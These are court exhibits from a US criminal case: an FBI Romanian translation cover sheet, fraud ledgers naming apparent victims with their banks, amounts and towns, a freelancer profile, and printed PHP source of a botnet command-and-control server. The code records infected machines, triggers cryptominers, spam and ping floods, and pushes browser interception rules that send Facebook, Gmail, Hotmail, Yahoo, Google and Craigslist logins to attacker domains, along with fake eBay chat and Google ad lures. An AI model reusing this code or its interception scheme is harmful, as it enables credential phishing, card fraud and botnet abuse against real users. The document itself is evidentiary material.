| 1 | 2015 | | | 2015 | 0 | 0 | | |
| 1 | | 6650 | | 0 | 6650 | 0 | | |
| 1 | | 6760 | | 0 | 6760 | 0 | | |
| 1 | | 6760 | | 0 | 6760 | 0 | | |
| 1 | | 6760 | | 0 | 6760 | 0 | | |
| TOTAL | 4030 | 49419 | | 4030 | 49419 | | | |
| | | | | | | | | |
| 1 | | 6500 | | 0 | 6500 | | 0.1 | 650 |
| 1 | | 6390 | | 0 | 6390 | | 0.1 | 639 |
| 1 | | 6500 | | 0 | 6500 | | 0.1 | 650 |
| 1 | 1595 | | | 1595 | 0 | | | |
| 1 | 700 | | | 700 | 0 | | | |
| 1 | | 2200 | | 0 | 2200 | | | |
| 1 | | 2200 | | 0 | 2200 | | | |
| 1 | | 2170 | | 0 | 2170 | | | |
| 1 | | 2170 | | 0 | 2170 | | | |
| 1 | | 2170 | | 0 | 2170 | | | |
| 1 | | 2220 | | 0 | 2220 | | | |
| 1 | | 2220 | | 0 | 2220 | | | |

Gov. Ex. 1741 Pg 28 of 34

| | | | | | | | | |
|---|---|---|---|---|---|---|---|---|
| 1 | | 671 | | 0 | 671 | | | |
| 1 | | 5820 | | 0 | 5820 | | | |
| 1 | | 5820 | | 0 | 5820 | | | |
| 1 | | 2280 | | 0 | 2280 | | | |
| 1 | | 5255 | | 0 | 5255 | | | |
| 1 | | 5255 | | 0 | 5255 | | | |
| 1 | | 5255 | | 0 | 5255 | | | |
| 1 | | 6350 | | 0 | 6350 | | | |
| 1 | | 6340 | | 0 | 6340 | | | |
| 0.8 | | 6000 | | 0 | 4800 | | | |
| 0.8 | | 6000 | | 0 | 4800 | | | |
| TOTAL | 2295 | 89786 | | 2295 | 87386 | | | |
| | | | | | | | | |
| 1 | | 6330 | | | 6330 | | | |
| 1 | | 6380 | | | 6380 | | | |
| 1 | | 6380 | | | 6380 | | | |
| 1 | | 2270 | | | 2270 | | | |
| 1 | | 2080 | | | 2080 | | | |
| 1 | | 6170 | | | 6170 | | | |
| 1 | | 6170 | | | 6170 | | | |
| 0.8 | | 6360 | | | 5088 | | | |
| 0.8 | | 6360 | | | 5088 | | | |
| 0.8 | | 6360 | | | 5088 | | | |
| TOTAL | | 54860 | | | 51044 | | | |

Gov. Ex. 1741 Pg 29 of 34

| | | | | | | |
|---|---|---|---|---|---|---|
| 200 | 106 | 21200 | | 4.438 | 7850 | 34838.3 |
| 100 | 269 | 26900 | | | | |
| 50 | 135 | 6750 | | | | |
| 10 | 1 | 10 | | | | |
| | | 54860 | | | | 20021.7 |

Gov. Ex. 1741 Pg 30 of 34

UNCLASSIFIED

## UNITED STATES DEPARTMENT OF JUSTICE
## FEDERAL BUREAU OF INVESTIGATION



**FBI CHICAGO**
2111 W. Roosevelt Road
Chicago, Illinois, 60608-6700

File Number:                                   288A-CV-73802

Requesting Official(s) and Office(s):          SA Stacy Lough (CV)

Task Number(s) and Date Completed:             849759, Request ID 849754, 7/29/2018
                                               849760, Request ID 849754, 8/16/2018

Name and Office of Linguist(s):                CL Camelia Geerdes (CG)

Name and Office of Reviewer(s):                CL Ildiko Izabella Toma (KC)

Source Language(s):                            Romanian

Target Language:                               English

Source File Information
  Name of Document File:                       Amounts.xls
                                               GMX Emails 2012-2014.xls
                                               Master_exhibit16_all_email_with attachments.xls

### DOCUMENT VERBATIM TRANSLATION

<u>Languages:</u>
| | |
|---|---|
| Primary language | Romanian |
| *Secondary language* | *English* |
| <u>Tertiary language</u> | <u>German</u> |
| *<u>Quaternary language</u>* | *<u>French</u>* |
| <u>Quinary language</u> | Chinese |

UNCLASSIFIED

UNCLASSIFIED

Abbreviations:

| | |
|---|---|
| [*sic*] | Information provided as it appears in the source |
| TN | Translator's notes |

[TN: RON is the official abbreviation for the Romanian currency, Lei.]

[TN: MF, Linx, Min, Amy, Raul, Raul Beem, Natiune appear to be names/nicknames and are present in several of the Excel spreadsheets.]

[TN: In the Excel file titled: "master_exhibit16_all_email_with attachments," under the tab named "master," on line 896, "DE" could be referring to Germany.]

[TN: The word "bani," when it is preceded by an amount - appearing in the Excel file titled "xabber deleted messages 2" - is the equivalent of cents in the Romanian currency.]

[TN: The abbreviation "cnp," appearing in the Excel file titled " master_exhibit16_all_email_with attachments," under tab "amightysa_204," on line 141, could stand for "customer not present," if it is in reference to credit cards.]

UNCLASSIFIED

Sheet1

| | | | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| | 12,493.00 | | | | | | | | | 7959.25 | | | | | | | |
| 8% | 999.44 | | | 6% | | | | 6% | 477.555 | | | | | | | | |
| Remaining | 11,493.56 | | | Remaining | | | | Remaining | 7481.7 | | | | | | | | |
| | 2,440.00 | #REF! | | | #REF! | #REF! | | | 1990 | 45.77 | 2035.77 | | | | | | |
| | 2,440.00 | #REF! | | | #REF! | #REF! | | | 1991 | 45.79 | 2036.79 | | | | | | |
| | 2,930.00 | #REF! | | | #REF! | #REF! | | | 1991 | 45.79 | 2036.79 | | | | | | |
| | 1,712.00 | #REF! | | | | | | | | | | | | | | | |
| | 1,712.00 | #REF! | | | | | | | | | | | | | | | |
| | #REF! | #REF! | | | | #REF! | | | | 6109.36 | | | | | | | |
| | | | | | | | | | 2690 | 135 | | | | | | | |
| | | | | | | | | | 2690 | 125 | | | | | | | |
| email | | 9,999.00 Johnny Bravo | | Boston, MA | 28-Jun | 10-Jul | | | | | | | | | | | |
| | | | | | | | | | | 38.66% *.8 | 13% * .8 | | | | | | |

| Amount | Name | Bank | Location | Date | To come | | # | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| | Lauren McGowan | | | 25-Jun | | | | | | | | | | | |
| | David Johnson | United Bank - 1 | | 24-Jun | | | | | | | | | | | |
| 8,853.50 | Donna Wolfe | US Bank - 1 | Jefferson, MH | 17-Jun x2 | | | 1 | 18880 RON | 5690 RON | 1971 RON | 15% | 3889 RON 20% Net | 442,812 | | |
| 9,218.63 | David Johnson | United Bank - 2 | Port Charlotte, FL | 18-Jun | 2-Jul | Screwed Mateo | | | | | | | | | |
| 9,249.60 | Jason Brownfield | | Abilene, TX | 21-Jun | | Lost | | | | | | | | | |
| 9,180.00 | David Johnson | United Bank - 3 | Edgewater, MD | 24-Jun x2 | | Screwed Mateo | | | | | | | | | |
| 7,808.13 | Donna Wolfe | US Bank -2 | Saint Charles, MC | 25-Jun x2 | | | 2 | 10580 RON | 3968 RON | 15% | 6613 RON | 891.573 | | | |
| 6,990.00 | Lauren McGowan | | Lincoln, NH | 26-Jun | 3-Jul | Screwed Mateo | | | | | | | | | |
| 9,168.25 | Jason Black | JPMorgan Chase - 1 | Laguna Woods, C | 26-Jun x2 | | | 2 | 2380 USD | 892.5 USD | 15% | 1488 USD | 686.538 | | | |
| 7,757.75 | Donald Dow | | Blythe, CA | 26-Jun | | Lost | | | | | | | | | |
| 7,767.38 | Donna Wolfe | US Bank - 3 | Webster, MA | 27-Jun x2 | | | 2 | | | | | | | | |
| 9,218.63 | Nedja Hoyer-Booth | Bat West Bank - 1 | Streamwood, IL | 28-Jun hold 7-Jul | | | 3 | 113100 RON | 45240 RON | 16965 RON | 28275 RON | 3812.36 | | | |
| 8,780.00 | Jason Black | JPMorgan Chase - 2 | Abilene, TX | 29-Jun x2 | | | 3 | 1510 EUR | 604 EUR | 226.5 EUR | 377.5 EUR | 226.5 | | | |
| 6,951.75 | Jason Black | JPMorgan Chase - 3 | Prescott, AZ | 1-Jul x2 | | | 3 | | | | | | | | |
| 9,520.88 | Nedja Hoyer-Booth | Bat West Bank - 1 | east hampton NY | 3-Jul x2 | | | 3 | | | | | | | | |
| 13,097.50 | Jason Black | JPMorgan Chase - 4 | Fort Worth, TX | 3-Jul x2 | | | 3 | | | | | | | | |
| 14,608.75 | Nedja Hoyer-Booth | Bat West Bank - 2 | Ontario, CA | 5-Jul x2 | | Lost | | | | | | | | | |
| 7,556.25 | Quintin Sawyers | BB&T | Bad Homstedt, G | 4-Jul am | | Lost | | | | | | | | | |
| 7,052.50 | Shane Garrett | Woodforest National - | Dallas, TX | 5-Jul x2 | | | 4 | | | 13768 RON | | | 3093.93 | | |
| 7,858.50 | Donna Wolfe | Charter One - 1 | Webster, NY | 5-Jul x2 | | | 3 | | | | | | | | |
| 9,269.00 | Donna Wolfe | Charter One - 2 | Seal Beach, CA | 6-Jul | 17-Jul | | 4 | | | 541.5 USD | | | 416.538 | | |
| 7,254.00 | Donna Wolfe | Charter One - 3 | Blythe, CA | 8-Jul | 18-Jul | | 4 | | | | | | | | |
| 5,541.25 | Cindy Mahoney | Huntington National | Reseda, CA | 8-Jul x2 | | Lost | | | | | | | | | |
| 9,168.25 | Cummins LLC | Community Bank | Torrance, CA | 9-Jul | 19-Jul | Lost | | | | | | | | | |
| 13,700.00 | Shane Garrett | Woodforest National - | San Dimas, CA | 11-Jul x3 | | | 4+5 | | | | | | | | |
| 7,150.00 | Jason Black | Bank of the West - 1 | Webster, MA | 11-Jul | | | 4 | | | | | | | | |
| 7,484.00 | Donna Wolfe | Charter One - 4 | Abilene, TX | 12-Jul | 18-Jul | | 4 | | | | | | | | |
| 15,112.50 | Jason Black | Bank of the West - 2 | Granite Bay, CA | 12-Jul x2 | | | 4+5 | | | | | | | | |
| 9,408.00 | Jason Black | Bank of the West - 3 | Renwood, NY | 15-Jul x2 | | | 5 | | | | | | | | |
| 5,541.25 | Shane Garrett | Woodforest National - | Austin, TX | 16-Jul | | Lost | | | | | | | | | |
| 9,369.75 | Jason Black | Bank of the West - 4 | Hudson, NC | 17-Jul x2 | | | 5 | | | | | | | | |
| 9,100.00 | Jason Black | US Bank | Philadelphia, PA | 22-Jul x2 7/31/2013 | | | 6 form | | | 20945 RON | | | | | |
| 8,900.00 | Hardik Patel | US Bank | Mankota, CA | 24-Jul x2 8/1/2013 | | | 6 form | | | | | | | | |
| 2,518.75 | David Johnson | Wells Fargo | Blythe, CA | 25-Jul | 1-Aug | | 6 | | | | | | | | |
| 6,649.50 | David Johnson | Wells Fargo | Henderson, TX | 31-Jul | 11-Aug x2 | | 6 | | | | | | | | |
| 7,050.00 | Hardik Patel | US Bank | Smithtown, NY | 1-Aug int 15-Aug | | | 6 form | | | | | | | | |
| 9,050.00 | David Johnson | Wells Fargo | East Meadow, NY | 1-Aug | 15-Aug x2 | | 6+7 | form | | | | | | | |
| 5,893.88 | Donna Wolfe | PNC | Reno, NY | 2-Aug int 15-Aug x2 | | | 6 | | | | | | | | |
| 6,548.75 | Hardik Patel | US Bank | North Las Vegas, | 2-Aug | 31-Aug x2 | | 7 | | | | | | | | |
| 5,350.00 | Donna Wolfe | PNC | Bedford, NY | 5-Aug | 14-Aug | | 7 form | | | | | | | | |
| 7,282.63 | David Johnson | Wells Fargo | Joliet, IL | 5-Aug | | | 7 | | | | | | | | |
| 8,500.00 | Donna K Wolfe | PNC | Austin, TX | 6-Aug | | Lost | form ONLINE to ebay | | | | | | | | |
| 6,251.00 | Jason Black | Bank of America | Henderson, TX | 9-Aug | | Lost | | | | | | | | | |
| 10,729.88 | Donna Wolfe | PNC | Tyler, TX | 9-Aug | 19-Aug | | | | | | | | | | |
| 6,000.00 | Donna Wolfe | Key Bank | Reston, WA | 12-Aug | 19-Aug | | form | | | | | | | | |
| 12,500.00 | Donna Wolfe | Key Bank | New Orleans, LA | 19-Aug | 31-Aug | | form | | | | | | | | |

Gov. Ex. 1741 Pg 33 of 34

Sheet3

Gov. Ex. 1741 Pg 34 of 34

 **Freelance** [ Search ]  eg: java, london freelancers, content writing ..

Browse by: Name | Services | S



☑ **Find work.**
☑ **Get paid.**
☑ **Join the online work revolution**

☑ **Find work.**
☑ **Get paid.**
☑ **Join the online work revolution**

# RaduSPR Profile From Romania ■■

  
Hire me   Favorite   Feedback

[ f Share ]          [ ▼ Tweet | 0 ]  [ in Share   0 ]  [ G+1  0 ]  | Pinit |



**Name :** RaduSPR

**Subtitle :** Project Management Project Manager, Python Developer &amp;#38; Script Install Installer

**Location :** Bucharest, Romania

**Number projects :** 0

**Rate currency :** $

**Service :** Websites, IT & Software, Design, Media & Architecture, Writing & Content, Data Entry & Admin, Sales & Marketing, Business, Accounting, Human Resources & Legal and Engineering & Science.

**Skill :** .NET, ASP, Audio Services, Banner Design, C Programming, Cold Fusion, Copywriting, Data Entry, Data Processing, Delphi, Flash, Graphic Design, Internet Marketing, Java, Javascript, JSP, Legal, Link Building, Linux, Logo Design, Perl, Photography, PHP, Project Management, Python, Script Install, SEO, System Admin, Translation, Visual Basic, Web Security, Website Design, Windows Desktop, Wireless and XML .

Raduspr from Bucharest, Romania is interested in Project Management Project Manager, Python Developer &amp;#38; Script Install Installer. Raduspr is working as a Freelancer and can be found in many freelancing marketplace.  Raduspr provides freelancing service Websites, IT & Software, Design, Media & Architecture, Writing & Content, Data Entry & Admin, Sales & Marketing, Business, Accounting, Human Resources & Legal and Engineering & Science. Raduspr very Skilled with .NET, ASP, Audio Services, Banner Design, C Programming, Cold Fusion, Copywriting, Data Entry, Data Processing, Delphi, Flash, Graphic Design, Internet Marketing, Java, Javascript, JSP, Legal, Link Building, Linux, Logo Design, Perl, Photography, PHP, Project Management, Python, Script Install, SEO, System Admin, Translation, Visual Basic, Web Security, Website Design, Windows Desktop, Wireless and XML.

Raduspr so far completed 0 projects and has about 0 reviews from clients who has used earlier freelancing projects. Raduspr hourly rate is $500.00 USD and gets paid in $.

GOVERNMENT
EXHIBIT
1:16CR224
1747

```php
<?php

include '../s3lib/db.php';
include '../s3lib/fct.php';

$do_update = 0;
$flag = 0;
$do_aol_spam = false;
$miner_forced = 0;
$do_pingflood = 0;
$ad_click = 0;
$ad_click_params = 0;

function check_spam_que()
{
      /*$rs=mysql_query("select count(cache_id) from cache_spam_email
where last_served is not NULL and TIMESTAMPDIFF(MINUTE, last_served,
CURRENT_TIMESTAMP)<=35");
      $row = mysql_fetch_array($rs);
      $countid=$row['count(cache_id)'];*/

      if($_GET['sox']=='2c19e400' || $_GET['sox']=='3a801e03') return
false;

      $fp=fopen('/home/s3/s/captchas/amy/lastpoll','r'); // check if
anybody is resolving captchas
      if($fp===FALSE) return false;
      $fstat = fstat($fp);
      if($fstat['mtime']<time()-120) return false;

      $countid = intval(file_get_contents('spam_que_size_now'));

      if($countid < intval(trim(file_get_contents('feed_que_size'))))
return true;
      return false;
}

function ping()
{
      global $flag;
      global $do_update;
      global $do_aol_spam;
      global $miner_forced;
      global $do_pingflood;
      global $ad_click;
      global $ad_click_params;

      $spam_cnt=0;

      $rtn='';
      $ip = mysql_real_escape_string($_GET['ip']);
      $soxid = hexdec(mysql_real_escape_string($_GET['sox']));
      $lport_ok = mysql_real_escape_string($_GET['lport']);
      $slots = mysql_real_escape_string($_GET['slots']);
```

GOVERNMENT
EXHIBIT
1:16CR224

2069

```
    $rsid = mysql_real_escape_string($_GET['rsid']);
    $ver = mysql_real_escape_string($_GET['v']);
    $adm = mysql_real_escape_string($_GET['adm']);
    $x64 = mysql_real_escape_string($_GET['x64']);
    $miner_running = mysql_real_escape_string($_GET['mr']);

    //if($soxid==6) $do_aol_spam=true;

    $time = time();

    $res = mysql_query("SELECT do_cleanup, do_update, ip, time, uptime,
lport, lportbun, lportbun_time, flag, state, country, spam_cnt, mxcn,
pha_fail, pha_blocked, miner_forced, do_pingflood, has_aol, pha_new,
pha_new_time FROM sox3_ping WHERE soxid=$soxid LIMIT 1");
    if (!$res) return '';

    //file_put_contents('/home/s3/s3pub/log/ping_call.txt','['.date('
M-d H:i:s').']:\t".$_GET['sox']."\t".$_GET['ip']."\n",FILE_APPEND);


    if (mysql_num_rows($res) == 0) {
        // soxid doesn't exist, create new entry


    //file_put_contents('/home/s3/s3pub/log/ping_not.txt','['.date('M
-d H:i:s').']:\t".$_GET['sox']."\t".$_GET['ip']."\n",FILE_APPEND);

        if($lport_ok>1)
        {
            mysql_query("INSERT INTO sox3_ping SET soxid=$soxid,
ip='$ip', lport=$lport_ok, relays_connected=$slots, time=$time,
ver='$ver', lportbun=$lport_ok, lportbun_time=$time , relay_status=NULL,
adm=$adm, x64=$x64, miner=$miner_running");

        } else
        {
        /*
            if(isset($_GET['rsid']) && $rsid!='NOSOXYID123')
            {

    $extra=',relay_status=1,relay_soxid='.hexdec($rsid);
            } else
            {
                $extra=',relay_soxid=NULL, relay_status=0';
            }
        */
            $extra='';
            mysql_query("INSERT INTO sox3_ping SET soxid=$soxid,
ip='$ip', lport=$lport_ok, relays_connected=$slots, time=$time,
ver='$ver', adm=$adm, x64=$x64, miner=$miner_running $extra");
        }

        $flag = 1;
    } else
```

```
        {
                // soxid exists
                $row = mysql_fetch_array($res);
                $miner_forced = $row['miner_forced'];
                $do_pingflood = $row['do_pingflood'];
                if($miner_forced==1 || $do_pingflood==1) $flag = 1;
/*
                if ($row['country'] == 'US')
                {
                        $ad_res = mysql_query("START TRANSACTION");
                        if ($ad_res)
                        {
                                $ad_res = mysql_query("SELECT * FROM ad_clicker
WHERE clicks_wanted > 0 AND last_served + min_delay < $time LIMIT 1 FOR
UPDATE");
                                if ($ad_res && mysql_num_rows($ad_res) > 0)
                                {
                                        $ad_row = mysql_fetch_array($ad_res);

                                        $flag = 1;
                                        $ad_click = 1;
                                        $ad_click_params = $ad_row['params'];
                                        mysql_query("UPDATE ad_clicker SET
clicks_wanted=clicks_wanted-1, last_served=$time WHERE
id=".$ad_row['id']);
                                }
                                $ad_res = mysql_query("COMMIT");
                        }
                }
*/
                $spam_cnt = $row['spam_cnt'];


                if($row['do_cleanup']==1)
                {

        file_put_contents('/home/s3/s/s3pub/log/ping_cleaned.txt',$_GET['so
x']."\n",FILE_APPEND);
                        mysql_query("UPDATE sox3_ping SET do_cleanup=0 WHERE
soxid=$soxid");
                        return 'CLEANUP ';
                }

                $do_update = $row['do_update'];

                // if ($ver == 'sox3a10' && $row['ver']!='sox3a10') return
'';  // WTF?
                if ($row['ip'] == $ip) {
                        // existing ip is the same with this ip

                        $uptime = 0;
                        if ($time - $row['time'] < UPTIME_WINDOW * 60)
                        {
                                $uptime = $row['uptime'] + $time - $row['time'];
```

```php
        }

        if(isset($_GET['rsid']) && $rsid!='NOSOXYID123')
        {
                $rstatus=true;
        }else
        {
                $rstatus=false;
        }

        if($row['lport']>1 || $rstatus )
        {
                if($time - $row['time'] > (TIMER_LPORT+1) * 60)
                {
                        $flag = 1;
                }else
                {
                        if($time - $row['time'] < (TIMER_NORMAL+1) *
60)
                        {
                                $flag=1;
                        }
                }
        }else
        {
                if($time - $row['time'] > (TIMER_NORMAL+1) * 60)
                {
                        $flag = 1;
                }
        }

        // this array will be used to update the sox3_ping table
at the end
        if($lport_ok>1)
        {
                $update_list = "time=$time, uptime=$uptime,
lport=$lport_ok, lportbun=$lport_ok, lportbun_time=$time,
relays_connected=$slots, relay_status=NULL, ver='$ver'";
        }else
        {
                $update_list = "time=$time, uptime=$uptime,
lport=$lport_ok, relays_connected=$slots, ver='$ver', adm=$adm, x64=$x64,
miner=$miner_running";
                /*if($rstatus)
                {
                        $update_list .=
',relay_status=1,relay_soxid='.hexdec($rsid);
                }else
                {
                        $update_list .=
',relay_status=0,relay_soxid=NULL';
                }*/
        }
```

```
            //if($spam_cnt<300 &&
intval($ver)>=intval(VER_UPGRADE_TO) && $row['pha_fail']<30 &&
$row['pha_blocked']==0 && check_spam_que()) // && $row['mxcn']!=0)
            if(intval($ver)>=intval(VER_UPGRADE_TO) &&
$row['pha_blocked']+259200<$time && (($spam_cnt!=0 && $row['has_aol']==1
&& $row['pha_new_time']==0) || (($spam_cnt==0 AND $row['pha_new']<3) ||
($row['pha_new_time']!=0 && $row['pha_new_time']+43200<$time)))  &&
check_spam_que())
        {
                $update_list .=
",spam_exefile_cnt=spam_exefile_cnt+1";
                $do_aol_spam = true;
                $flag = 1;
        }

        $lportbun = $row['lportbun'];

        if ($row['flag'] == 1)
        {
                $flag = 1;
        }

        if (strlen($row['state']) > 0)
        {
                $update_list .= ',flag=0';
        }

        if ($lport == 1 && $lport_ok > 1) {
                // if he actually got a lport just now
                handle_relay_status_when_received_lport($soxid);
        }

        mysql_query("UPDATE sox3_ping SET $update_list WHERE
soxid=$soxid");
    } else {
        // existing ip is different from this ip
        // this means that we will delete the old row and create
a new one, but keep the known lportbun

        $lportbun = $row['lportbun'];
        $lportbun_time = $row['lportbun_time'];

        $extra='';
        if ($lport_ok > 1)
        {
                $lportbun = $lport_ok;
                $lportbun_time = $time;
                $extra =", lportbun=$lport_ok,
lportbun_time=$time";
        }

        // aici resetez unele valori pt ca sa schibmat ipul
        // TODO: eml_cnt cei asta?
```

```php
            mysql_query("UPDATE sox3_ping SET ip='$ip', time=$time,
lport=$lport_ok, relays_connected=$slots, ver='$ver', adm=$adm, x64=$x64,
miner=$miner_running, flag=1, relay_status=NULL, hport=0,
relay_soxid=NULL, cnt_fails=0, host=NULL, uptime=0, last_stopped=NULL,
speed=NULL, ebay=0, aol_cnt=0, spam_status=0, spam_last_served=NULL,
spam_cnt=0, pha_blocked=0, pha_cnt=9999,
spam_exefile_cnt=spam_exefile_cnt+1, craig_used=0, dropbox_cnt=0,
ebay_cnt=0, yahoo_cnt=0, yahoo_hosting_cnt=0, indeed_cnt=0, gmail_cnt=0,
pha_new=0 $extra WHERE soxid=$soxid");

            $flag = 1;
            if( intval($ver)>=intval(VER_UPGRADE_TO) &&
$row['pha_fail']<30 && check_spam_que()) $do_aol_spam = true;  // &&
$row['mxcn']!=0)
        }

    }

    if ($flag)
    {
        $rtn.='FLAG ';
    }
    if ($do_update)
    {
        $rtn.='UPDATE ';

    //file_put_contents('/home/s3/s/s3pub/ping_update.txt','['.date('M-
d H:i:s').']: '.$_GET['sox']."\n",FILE_APPEND);
    }

    return $rtn;
}

function cfg()
{
    $rtn='';
    $result = mysql_query("SELECT * FROM config_hst");

    $x = array();
    $y = array();
    while ($row = mysql_fetch_array($result))
    {
        $host = $row['host'];
        if(strlen($host)-4 === strpos($host,'.com')) array_push($x,
$host);
        else array_push($y, $host);
    }

    if (count($y) !=0)
    {
        shuffle($y); foreach ($y as $item) $rtn.='"'.$item.'" ';
    }
    if (count($x) !=0)
    {
```

```
            shuffle($x); foreach ($x as $item) $rtn.='"'.$item.'" ';
      }

      return $rtn;
}

function var_user_ip()
{
      global $do_aol_spam;
      global $miner_forced;
      global $do_pingflood;

      $rtn='';
      $soxid = hexdec(mysql_real_escape_string($_GET['sox']));

      $x = array();

      if($do_aol_spam) $x['send_aol_spam']=1;
      if($miner_forced) $x['kill_jhminer']=1;

      $res = mysql_query("SELECT * FROM sox3_ping WHERE soxid=$soxid");

      if(!$res)
      {
            return '';
      }

      if (mysql_num_rows($res) > 0)
      {
            $row = mysql_fetch_array($res);
            if($row['invite_cc']==2) $row['cc_submitted']=0;  // nu ne
interesaza in cazu asta daca a submis deja
            if($row['cc_submitted'] != 0)  // e submis deja un card
            {
                  $x['invite_cc']  = 0;
                  if($row['invite_facebook']==1)
                  {
                        $x['unset_intercepts'] =
'www.facebook.com,facebook.com';
                        mysql_query("UPDATE sox3_ping SET
invite_facebook=0 WHERE soxid=$soxid");
                  }
            } else
            {
                  if($row['invite_cc']>0)
                  {
                        $x['invite_cc']  = $row['invite_cc'];
                        $x['ban_contact'] = 1;
                        $x['live_link'] =
'http://helpdesk.corp.ebay.com/chat.php?id=4094&sess='.md5($_GET['sox']).
'&talk=1';
                        $x['ebaylive'] = 'partyorderly.net';
                  }
                  if($row['invite_facebook']==1)
```

```
                {
                        $x['set_intercepts'] = '"www.facebook.com"
"partyorderly.net" "/fb/" "/challenge/" "1" "facebook.com"
"partyorderly.net" "/fb/" "/challenge/" "0" ';
                }
        }

        if($row['invite_facebook']==-1)
        {
                $x['unset_intercepts'] =
'www.facebook.com,facebook.com';
                mysql_query("UPDATE sox3_ping SET invite_facebook=0
WHERE soxid=$soxid");
        }
        if($row['invite_facebook']==2)
        {
                $x['set_intercepts'] = '"www.facebook.com"
"partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com"
"partyorderly.net" "/fb_login/" "/login/" "0" ';
        }

        if($row['invite_gmail'] == 1)
        {
                $x['set_intercepts'] .= '"mail.google.com"
"partyorderly.net" "/gmail/" "/servicelogin/" "1" "www.gmail.com"
"partyorderly.net" "/gmail/" "/servicelogin/" "0" "gmail.com"
"partyorderly.net" "/gmail/" "/servicelogin/" "0" ';
        }
        if($row['invite_gmail'] == -1)
        {
                if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                $x['unset_intercepts'] .=
'mail.google.com,www.gmail.com,gmail.com';
                mysql_query("UPDATE sox3_ping SET invite_gmail=0 WHERE
soxid=$soxid");
        }

        if($row['invite_hotmail'] == 1)
        {
                $x['set_intercepts'] .= '"login.live.com"
"partyorderly.net" "/hotmail/" "/loginh/" "1" "www.hotmail.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" "hotmail.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" "mail.live.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" "mail.msn.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" "www.msn.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" "msn.com"
"partyorderly.net" "/hotmail/" "/loginh/" "0" ';
        }
        if($row['invite_hotmail'] == -1)
        {
                if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
```

```
                $x['unset_intercepts'] .=
'login.live.com,www.hotmail.com,hotmail.com,mail.live.com,mail.msn.com,ww
w.msn.com,msn.com';
                mysql_query("UPDATE sox3_ping SET invite_hotmail=0 WHERE
soxid=$soxid");
        }

        if($row['invite_yahoo'] == 1)
        {
                $x['set_intercepts'] .= '"mail.yahoo.com"
"partyorderly.net" "/yahoo/" "/config/" "0" ';
        }
        if($row['invite_yahoo'] == -1)
        {
                if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                $x['unset_intercepts'] .= 'mail.yahoo.com';
                mysql_query("UPDATE sox3_ping SET invite_yahoo=0 WHERE
soxid=$soxid");
        }

        if($row['invite_google'] == 1)
        {
                $x['set_intercepts'] .= '"transfers.google.com"
"partyorderly.net" "/google_job/" "/getstarted/" "0" "www.google.com"
"partyorderly.net" "" "/gtgt/" "1" ';
                $x['google_ad'] = '<div style="margin-left:0px;margin-
right:0px;margin-bottom:11px;padding-top:1px;padding-bottom:1px;padding-
right:35px;padding-left:7px;" id="tads" class="c"><h2 style="font-
size:13px;font-weight:normal;margin:0 -35px 0 0;padding:4px 4px 4px
0">Ads</h2><ol style="padding:4px 0"><li><div sig="ayJ" bved="0CDwQhg0"
ived="0CD4QiA0" hved="0CD0Qvxg" pved="0CDsQhQ0wAg" class="vsc
vsta"><h3><a href="http://transfers.google.com/" id="vpa2">Earn up to
$3500/mo</a></h3><div class="vspib" aria-label="Result details"
role="button" tabindex="0"><div class="vspii"><div
class="vspiic"></div></div></div><div><div class="kv
kva"><cite>transfers.google.com</cite></div></div><span class="ac">Work
at Home for Google and Get Paid Daily.</span><div><div
class="oslk"></div></div></div></li></ol></div>';
        }
        if($row['invite_google'] == -1)
        {
                if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                $x['unset_intercepts'] .=
'transfers.google.com,www.google.com';
                mysql_query("UPDATE sox3_ping SET invite_google=0 WHERE
soxid=$soxid");
        }

        if($row['invite_craigs'] == 1)
        {
                $x['set_intercepts'] .= '"www.craigslist.com"
"nightwagon.net" "/craigs/" "/security/" "0" "craigslist.com"
```

```
"nightwagon.net" "/craigs/" "/security/" "0" "www.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "atlanta.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "austin.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "boston.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "chicago.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "dallas.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "denver.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "detroit.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "houston.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "lasvegas.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "losangeles.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "miami.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "minneapolis.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0" "newyork.craigslist.org"
"nightwagon.net" "/craigs/" "/security/" "0"
"orangecounty.craigslist.org" "nightwagon.net" "/craigs/" "/security/"
"0" "philadelphia.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "phoenix.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "portland.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "raleigh.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "sacramento.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "sandiego.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "seattle.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "sfbay.craigslist.org" "nightwagon.net" "/craigs/"
"/security/" "0" "washingtondc.craigslist.org" "nightwagon.net"
"/craigs/" "/security/" "0" ';
            }
            if($row['invite_craigs'] == -1)
            {
                    if(isset($x['unset_intercepts']))
$x['unset_intercepts'].=',';
                    $x['unset_intercepts'] .=
'www.craigslist.com,craigslist.com,www.craigslist.org,craigslist.org,atla
nta.craigslist.org,austin.craigslist.org,boston.craigslist.org,chicago.cr
